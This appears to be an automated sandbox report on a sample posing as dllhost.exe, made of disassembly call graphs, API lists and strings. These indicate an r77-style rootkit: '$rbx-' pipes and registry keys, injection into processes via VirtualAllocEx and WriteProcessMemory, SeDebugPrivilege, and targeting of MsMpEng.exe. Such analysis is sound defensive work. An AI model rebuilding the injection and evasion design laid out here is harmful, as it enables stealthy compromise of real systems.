18642->18654 18644 20175eb471d 18643->18644 18647 20175eb4250 2 API calls 18643->18647 18648 20175eb4120 3 API calls 18644->18648 18651 20175eb4753 18644->18651 18647->18644 18648->18651 18649 20175eb4120 3 API calls 18652 20175eb476f 18649->18652 18650 20175eb4250 2 API calls 18653 20175eb478b 18650->18653 18651->18649 18651->18652 18652->18650 18652->18653 
18653->18625 18655 20175eb4141 18654->18655 18656 20175eb4196 VirtualQuery 18655->18656 18657 20175eb41b0 18655->18657 18658 20175eb41ca VirtualAlloc 18655->18658 18656->18655 18656->18657 18657->18641 18658->18657 18659 20175eb41fb GetLastError 18658->18659 18659->18655 18659->18657 18663 20175eb4268 18660->18663 18661 20175eb42d7 18661->18643 18662 20175eb42bd VirtualQuery 18662->18661 18662->18663 18663->18661 18663->18662 18664 20175eb4322 GetLastError 18663->18664 18664->18663 18666 20175eb796b 18665->18666 18667 20175eb7981 SetLastError 18666->18667 18668 20175eb798f 18666->18668 18667->18668 18668->18630 17293 20175eb8672 17294 20175eb90c0 __std_exception_copy 38 API calls 17293->17294 17295 20175eb869d 17294->17295 17299 20175eb824c 17300 20175eb8270 __scrt_acquire_startup_lock 17299->17300 17301 20175ebb581 17300->17301 17302 20175ebcb10 __std_exception_copy 13 API calls 17300->17302 17303 20175ebb5aa 17302->17303 18742 20175ec494f 18743 20175ec495e 18742->18743 18744 20175ec4968 18742->18744 18746 20175ebc5ac LeaveCriticalSection 18743->18746 15569 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15570 1400036be K32EnumProcesses 15569->15570 15571 1400036d3 15570->15571 15572 14000371b SleepEx 15570->15572 15571->15572 15574 1400031c4 15571->15574 15572->15570 15575 1400031d5 15574->15575 15576 1400031fd 15574->15576 15580 140001868 OpenProcess 15575->15580 15576->15571 15579 140001868 31 API calls 15579->15576 15581 140001cd1 15580->15581 15582 1400018b0 IsWow64Process 15580->15582 15581->15579 15583 1400018c7 CloseHandle 15582->15583 15583->15581 15585 1400018ed 15583->15585 15585->15581 15586 14000192f OpenProcess 15585->15586 15586->15581 15587 14000194b OpenProcess 15586->15587 15588 140001a04 NtQueryInformationProcess 15587->15588 15589 14000196a K32GetModuleFileNameExW 15587->15589 15590 140001cc8 CloseHandle 15588->15590 15591 140001a29 15588->15591 15592 1400019b3 CloseHandle 15589->15592 15593 140001983 PathFindFileNameW lstrlenW 
15589->15593 15590->15581 15591->15590 15594 140001a33 OpenProcessToken 15591->15594 15592->15588 15596 1400019c1 15592->15596 15593->15592 15595 1400019a0 StrCpyW 15593->15595 15594->15590 15597 140001a51 GetTokenInformation 15594->15597 15595->15592 15596->15588 15598 1400019e0 StrCmpIW 15596->15598 15599 140001af4 15597->15599 15600 140001a79 GetLastError 15597->15600 15598->15590 15598->15596 15602 140001afb CloseHandle 15599->15602 15600->15599 15601 140001a84 LocalAlloc 15600->15601 15601->15599 15603 140001a9a GetTokenInformation 15601->15603 15602->15590 15607 140001b0f 15602->15607 15604 140001ae2 15603->15604 15605 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 15603->15605 15606 140001ae9 LocalFree 15604->15606 15605->15606 15606->15602 15607->15590 15608 140001b9f StrStrA 15607->15608 15609 140001bc8 15607->15609 15608->15607 15610 140001bcd 15608->15610 15609->15590 15610->15590 15611 140001bf8 VirtualAllocEx 15610->15611 15611->15590 15612 140001c27 WriteProcessMemory 15611->15612 15612->15590 15613 140001c46 15612->15613 15621 140002bfc 15613->15621 15615 140001c66 15615->15590 15616 140001c74 WaitForSingleObject 15615->15616 15617 140001c83 GetExitCodeThread 15616->15617 15618 140001cbd CloseHandle 15616->15618 15619 140001ca2 VirtualFreeEx 15617->15619 15620 140001c99 15617->15620 15618->15590 15619->15618 15620->15619 15624 1400020cc GetModuleHandleA 15621->15624 15625 1400020f5 15624->15625 15626 1400020ec GetProcAddress 15624->15626 15626->15625 17309 20175ebae42 17310 20175eb9324 __CxxCallCatchBlock 9 API calls 17309->17310 17311 20175ebae4f __CxxCallCatchBlock 17310->17311 17312 20175ebae93 RaiseException 17311->17312 17313 20175ebaeba 17312->17313 17314 20175eb9978 __CxxCallCatchBlock 9 API calls 17313->17314 17318 20175ebaec2 17314->17318 17315 20175ebaeeb __CxxCallCatchBlock 17316 20175eb9324 __CxxCallCatchBlock 9 API calls 17315->17316 17317 20175ebaefe 17316->17317 17319 20175eb9324 __CxxCallCatchBlock 9 API calls 17317->17319 
17318->17315 17321 20175eb8ff8 __CxxCallCatchBlock 9 API calls 17318->17321 17320 20175ebaf07 17319->17320 17321->17315 19142 20175ec4848 19145 20175eb904c 19142->19145 19146 20175eb9064 19145->19146 19147 20175eb9076 19145->19147 19146->19147 19148 20175eb906c 19146->19148 19149 20175eb9324 __CxxCallCatchBlock 9 API calls 19147->19149 19151 20175eb9324 __CxxCallCatchBlock 9 API calls 19148->19151 19152 20175eb9074 19148->19152 19150 20175eb907b 19149->19150 19150->19152 19154 20175eb9324 __CxxCallCatchBlock 9 API calls 19150->19154 19153 20175eb909b 19151->19153 19155 20175eb9324 __CxxCallCatchBlock 9 API calls 19153->19155 19154->19152 19156 20175eb90a8 19155->19156 19157 20175ebc2f4 14 API calls 19156->19157 19158 20175eb90b1 19157->19158 19159 20175ebc2f4 14 API calls 19158->19159 19160 20175eb90bd 19159->19160 18777 20175ebad48 18778 20175eb9324 __CxxCallCatchBlock 9 API calls 18777->18778 18779 20175ebad7d 18778->18779 18780 20175eb9324 __CxxCallCatchBlock 9 API calls 18779->18780 18781 20175ebad8b __except_validate_context_record 18780->18781 18782 20175eb9324 __CxxCallCatchBlock 9 API calls 18781->18782 18783 20175ebadcf 18782->18783 18784 20175eb9324 __CxxCallCatchBlock 9 API calls 18783->18784 18785 20175ebadd8 18784->18785 18786 20175eb9324 __CxxCallCatchBlock 9 API calls 18785->18786 18787 20175ebade1 18786->18787 18800 20175eb993c 18787->18800 18790 20175eb9324 __CxxCallCatchBlock 9 API calls 18791 20175ebae11 __CxxCallCatchBlock 18790->18791 18792 20175eb9978 __CxxCallCatchBlock 9 API calls 18791->18792 18796 20175ebaec2 18792->18796 18793 20175ebaeeb __CxxCallCatchBlock 18794 20175eb9324 __CxxCallCatchBlock 9 API calls 18793->18794 18795 20175ebaefe 18794->18795 18797 20175eb9324 __CxxCallCatchBlock 9 API calls 18795->18797 18796->18793 18799 20175eb8ff8 __CxxCallCatchBlock 9 API calls 18796->18799 18798 20175ebaf07 18797->18798 18799->18793 18801 20175eb9324 __CxxCallCatchBlock 9 API calls 18800->18801 18802 20175eb994d 18801->18802 18803 
20175eb9958 18802->18803 18804 20175eb9324 __CxxCallCatchBlock 9 API calls 18802->18804 18805 20175eb9324 __CxxCallCatchBlock 9 API calls 18803->18805 18804->18803 18806 20175eb9969 18805->18806 18806->18790 18806->18791 19161 20175ec485e 19162 20175eb9324 __CxxCallCatchBlock 9 API calls 19161->19162 19163 20175ec486c 19162->19163 19164 20175ec4877 19163->19164 19165 20175eb9324 __CxxCallCatchBlock 9 API calls 19163->19165 19165->19164 17343 20175ec465f 17344 20175ec46e2 17343->17344 17345 20175ec4677 17343->17345 17345->17344 17346 20175eb9324 __CxxCallCatchBlock 9 API calls 17345->17346 17347 20175ec46c4 17346->17347 17348 20175eb9324 __CxxCallCatchBlock 9 API calls 17347->17348 17349 20175ec46d9 17348->17349 17350 20175ebc2f4 14 API calls 17349->17350 17350->17344 18821 20175ec3960 18831 20175eb8ca0 18821->18831 18823 20175ec3988 18825 20175eb9324 __CxxCallCatchBlock 9 API calls 18826 20175ec3998 18825->18826 18827 20175eb9324 __CxxCallCatchBlock 9 API calls 18826->18827 18828 20175ec39a1 18827->18828 18829 20175ebc2f4 14 API calls 18828->18829 18830 20175ec39aa 18829->18830 18834 20175eb8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 18831->18834 18832 20175eb8d94 RtlUnwindEx 18832->18834 18833 20175eb8dd1 18833->18823 18833->18825 18834->18832 18834->18833 16600 20175eb7f60 16601 20175eb7f7c 16600->16601 16602 20175eb7f81 16600->16602 16604 20175eb8090 16601->16604 16605 20175eb80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16604->16605 16606 20175eb8127 16604->16606 16605->16606 16606->16602 17623 20175eb2e54 17625 20175eb2ea8 17623->17625 17624 20175eb2ec3 17625->17624 17627 20175eb37f4 17625->17627 17628 20175eb388a 17627->17628 17630 20175eb3819 17627->17630 17628->17624 17629 20175eb3f88 StrCmpNIW 17629->17630 17630->17628 17630->17629 17631 20175eb1e08 StrCmpIW StrCmpW 17630->17631 17631->17630 17632 20175ebd658 17633 20175ebd67d 17632->17633 17638 20175ebd694 
17632->17638 17634 20175ebd1f4 __std_exception_copy 13 API calls 17633->17634 17636 20175ebd682 17634->17636 17635 20175ebd724 17764 20175ebbb54 17635->17764 17637 20175ebd04c _invalid_parameter_noinfo 38 API calls 17636->17637 17661 20175ebd68d 17637->17661 17638->17635 17646 20175ebd7b6 17638->17646 17657 20175ebd6da 17638->17657 17665 20175ebd894 17638->17665 17727 20175ebda18 17638->17727 17642 20175ebd784 17645 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17642->17645 17644 20175ebd836 17647 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17644->17647 17648 20175ebd78b 17645->17648 17652 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17646->17652 17660 20175ebd6fd 17646->17660 17659 20175ebd841 17647->17659 17654 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17648->17654 17648->17660 17649 20175ebd7d7 17649->17644 17649->17649 17662 20175ebd87c 17649->17662 17770 20175ec0eb8 17649->17770 17650 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17650->17661 17651 20175ebd85a 17656 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17651->17656 17652->17646 17653 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17653->17657 17654->17648 17655 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17655->17659 17656->17661 17657->17653 17657->17660 17659->17651 17659->17655 17660->17650 17663 20175ebd06c _invalid_parameter_noinfo 17 API calls 17662->17663 17664 20175ebd891 17663->17664 17666 20175ebd8c2 17665->17666 17666->17666 17667 20175ebd8de 17666->17667 17668 20175ebd220 _invalid_parameter_noinfo 13 API calls 17666->17668 17667->17638 17669 20175ebd90d 17668->17669 17670 20175ebd926 17669->17670 17671 20175ec0eb8 38 API calls 17669->17671 17672 20175ec0eb8 38 API calls 17670->17672 17674 20175ebd9fc 17670->17674 17671->17670 17673 20175ebd943 17672->17673 
17673->17674 17676 20175ebd97f 17673->17676 17677 20175ebd98d 17673->17677 17678 20175ebd962 17673->17678 17675 20175ebd06c _invalid_parameter_noinfo 17 API calls 17674->17675 17688 20175ebda17 17675->17688 17680 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17676->17680 17681 20175ebd977 17677->17681 17779 20175ebeee0 17677->17779 17679 20175ebd220 _invalid_parameter_noinfo 13 API calls 17678->17679 17682 20175ebd96d 17679->17682 17680->17674 17681->17676 17685 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17681->17685 17686 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17682->17686 17684 20175ebda7a 17689 20175ebda8c 17684->17689 17696 20175ebdaa1 17684->17696 17685->17676 17686->17681 17687 20175ebd9b5 17690 20175ebd9d0 17687->17690 17691 20175ebd9ba 17687->17691 17688->17684 17788 20175ec13d8 17688->17788 17694 20175ebd894 52 API calls 17689->17694 17693 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17690->17693 17695 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17691->17695 17693->17676 17709 20175ebda9c 17694->17709 17695->17681 17698 20175ebdd78 14 API calls 17696->17698 17697 20175eb8070 _invalid_parameter_noinfo 8 API calls 17699 20175ebdd64 17697->17699 17700 20175ebdb0b 17698->17700 17699->17638 17704 20175ebdb1a 17700->17704 17797 20175ebf198 17700->17797 17801 20175ebd30c 17704->17801 17705 20175ebdba8 17706 20175ebd894 52 API calls 17705->17706 17708 20175ebdbb8 17706->17708 17707 20175ebdd78 14 API calls 17715 20175ebdbd2 17707->17715 17708->17709 17710 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17708->17710 17709->17697 17710->17709 17711 20175ebf198 9 API calls 17711->17715 17713 20175ebd894 52 API calls 17713->17715 17714 20175ebdcc8 FindNextFileW 17714->17715 17716 20175ebdce0 17714->17716 17715->17707 17715->17711 17715->17713 17715->17714 17717 20175ebd2a0 13 API calls 

                                            Control-flow Graph

                                            (control-flow graph of the function at 140002d4c; the rendered graph and its raw edge list are not reproduced here)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                            • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                            • API String ID: 2725631067-1382791509
                                            • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                            • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                            • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                            • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                                            Control-flow Graph

                                            (control-flow graph of the function at 140001868; the rendered graph and its raw edge list are not reproduced here)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                            • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                            • API String ID: 2456419452-2628171563
                                            • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                            • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                            • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                            • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                                            Control-flow Graph

                                             control_flow_graph 116 140003204-140003225 117 14000322b 116->117 118 14000341d-140003423 116->118 119 140003231-140003237 117->119 120 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 117->120 121 140003599-1400035bd ReadFile 118->121 122 140003429-14000342c 118->122 125 140003382-140003384 ExitProcess 119->125 126 14000323d-140003240 119->126 123 140003652-140003664 120->123 124 1400033c9-1400033da 120->124 121->123 127 1400035c3-1400035ca 121->127 128 140003432-140003438 122->128 129 14000358f-140003594 call 140001f7c 122->129 124->123 130 1400033e0-140003409 call 140001868 * 2 124->130 132 140003246-140003249 126->132 133 1400032ea-140003315 RegOpenKeyExW 126->133 127->123 134 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 127->134 135 140003534-140003547 call 1400020fc 128->135 136 14000343e-140003441 128->136 129->123 166 14000340e-140003416 130->166 142 1400032db-1400032e5 132->142 143 14000324f-140003252 132->143 139 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 133->139 140 140003317-14000334d RegDeleteValueW * 3 133->140 161 14000360d-140003613 134->161 162 14000363e-14000364c GetProcessHeap HeapFree 134->162 135->123 156 14000354d-14000355c call 1400020fc 135->156 145 140003443-140003449 136->145 146 140003480-140003491 call 1400020fc 136->146 139->123 140->139 142->123 152 140003254-14000325a 143->152 153 1400032ce-1400032d6 143->153 145->123 147 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 145->147 146->123 165 140003497-1400034b9 ReadFile 146->165 152->123 160 140003260-140003284 ReadFile 152->160 153->123 156->123 181 140003562-14000358a ShellExecuteW 156->181 160->123 168 14000328a-140003291 160->168 161->162 169 140003615-140003627 161->169 162->123 165->123 174 1400034bf-1400034c6 165->174 166->130 175 140003418 166->175 168->123 177 140003297-1400032c9 call 140001868 * 2 168->177 170 140003629-14000362b 169->170 171 14000362d-140003635 169->171 170->171 178 140003639 call 140001eec 170->178 171->169 179 140003637 171->179 174->123 182 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 174->182 175->123 177->123 178->162 179->162 181->123 182->162 187 140003510-14000351c 182->187 187->162 190 140003522-14000352f call 140002434 187->190 190->162
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                            • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                            • API String ID: 4225498131-1538754800
                                            • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                            • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                            • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                            • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                            • String ID:
                                            • API String ID: 4084875642-0
                                            • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                            • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                            • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                            • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                            • String ID:
                                            • API String ID: 3197395349-0
                                            • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                            • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                            • String ID: .text$C:\Windows\System32\
                                            • API String ID: 2721474350-832442975
                                            • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                            • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                            • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                            • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                            • String ID: M$\\.\pipe\$rbx-childproc
                                            • API String ID: 2203880229-2840927681
                                            • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                            • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                            • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                            • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                                            Control-flow Graph

                                            control_flow_graph 243 140002cb0-140002cba 244 140002cbd-140002cd0 call 140002300 243->244 247 140002cd2-140002cdb Sleep 244->247 248 140002cdd-140002cea ConnectNamedPipe 244->248 247->244 249 140002d21-140002d26 Sleep 248->249 250 140002cec-140002d0d ReadFile 248->250 251 140002d2c-140002d35 DisconnectNamedPipe 249->251 250->251 252 140002d0f-140002d14 250->252 251->248 252->251 253 140002d16-140002d1d call 140003204 252->253 254 140002d1f 253->254 254->251
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                            • String ID: \\.\pipe\$rbx-control
                                            • API String ID: 2071455217-3647231676
                                            • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                            • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                            • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                            • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                                            Control-flow Graph

                                            control_flow_graph 264 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 265 1400036be-1400036d1 K32EnumProcesses 264->265 266 1400036d3-1400036e2 265->266 267 14000371b-140003724 SleepEx 265->267 268 1400036e4-1400036e8 266->268 269 14000370c-140003717 266->269 267->265 270 1400036ea 268->270 271 1400036fb-1400036fe call 1400031c4 268->271 269->267 272 1400036ee-1400036f3 270->272 273 140003702 271->273 274 1400036f5-1400036f9 272->274 275 140003706-14000370a 272->275 273->275 274->271 274->272 275->268 275->269
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                            • String ID:
                                            • API String ID: 3676546796-0
                                            • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                            • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                            • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                            • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                            • String ID:
                                            • API String ID: 1323846700-0
                                            • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                            • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                            • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                            • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                                            Control-flow Graph

